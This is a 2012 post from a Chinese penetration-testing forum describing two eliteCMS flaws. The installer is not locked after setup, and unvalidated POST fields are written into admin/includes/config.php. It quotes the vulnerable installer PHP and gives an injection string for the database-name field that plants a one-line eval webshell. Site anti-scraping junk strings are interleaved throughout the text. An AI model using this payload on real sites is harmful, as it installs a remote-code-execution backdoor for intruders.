中国网络渗透测试联盟
标题:
eliteCMS安装文件未验证 + 一句话写入安全漏洞
[打印本页]
作者:
admin
时间:
2012-11-18 13:59
标题:
eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
) ?/ ?+ g, G! f/ F( ~6 I
# Q. y# B/ e6 R
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
2 D h: L9 H+ G2 M& B
我们来看代码:
4 T& L) v( B6 I2 R$ j) \
- H3 Y4 J8 _% u8 X E
...
1 s( b5 ?% H- }. p# }7 H0 V' V: |3 r
elseif ($_GET['step'] == "4") {
# g) Q/ S( i$ U
$file = "../admin/includes/config.php";
) ]* W9 X: u6 g [
$write = "<?php\n";
. O- k& m3 L0 e
$write .= "/**\n";
* {( ]5 y, k2 ~" ]/ V h3 C
$write .= "*\n";
. {) Y8 v P @- G
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
# B+ ?" J5 O2 t9 N/ A& d
...略...
# G r; R I& J0 L) {
$write .= "*\n";
+ i% t7 \+ w4 e/ c- d# @! K
$write .= "*/\n";
& ] d% B6 B L+ d
$write .= "\n";
6 M l* _/ P" I
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
" m" @- k7 s2 ~7 \9 Q5 T9 \
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
P5 ? @- F0 ?8 w: h) e
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
' W; _& R/ W$ r1 Y) y: y# d
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
3 e% @; s; V5 g
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
& Q2 ?" N$ Z3 `- b1 u6 L2 c Z. s4 S
$write .= "if (!\$connection) {\n";
) m- k! V+ J4 ^2 x
$write .= " die(\"Database connection failed\" .mysql_error());\n";
1 H# A) |' l0 U& q; O' C
$write .= " \n";
# M# B1 k. ^$ y
$write .= "} \n";
# Q1 a4 M( i. N+ ?
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
+ c' q% D( f. F- Z5 m+ z3 H
$write .= "if (!\$db_select) {\n";
u; M- n% e; y; }( o1 T3 V$ O
$write .= " die(\"Database select failed\" .mysql_error());\n";
/ J$ x4 J# ~; `% S4 k, [
$write .= " \n";
% H/ ]; K/ ~5 o1 h! Y
$write .= "} \n";
( `6 u. z5 E) d
$write .= "?>\n";
, W6 G* O/ V. K4 {; E; k
6 n) c8 M" H% K' j. _
$writer = fopen($file, 'w');
" V4 {7 `0 [7 B; K' i1 e5 Y0 r
...
' ~3 X8 I f( i* L+ a
1 g. r3 a7 c' p
在看代码:
* Q+ M3 y9 T9 J2 R+ {+ S
% g* |" q( D2 J9 |" y$ \% V3 _
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
5 U* {3 Z& m" r" }
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
: V% @7 D2 A' q5 u
$_SESSION['DB_USER'] = $_POST['DB_USER'];
! N1 n; K0 ?3 R7 [8 h/ Z
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
- E: Q* `; Z% m
}+ f" H U# h8 t8 G
取值未作任何验证
5 W* Z) \* q$ c+ k' g" o
如果将数据库名POST数据:
" f5 H* T+ `5 M' l
* M/ M2 ]/ k% b. \5 g; r
"?><?php eval($_POST[c]);?><?php
- v" v7 z2 z5 D+ T- ^* s, r
' P6 u4 W- F5 S% w
将导致一句话后门写入/admin/includes/config.php
# e2 P6 i3 p5 {& o; ]/ j. a2 J6 P* G3 @
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2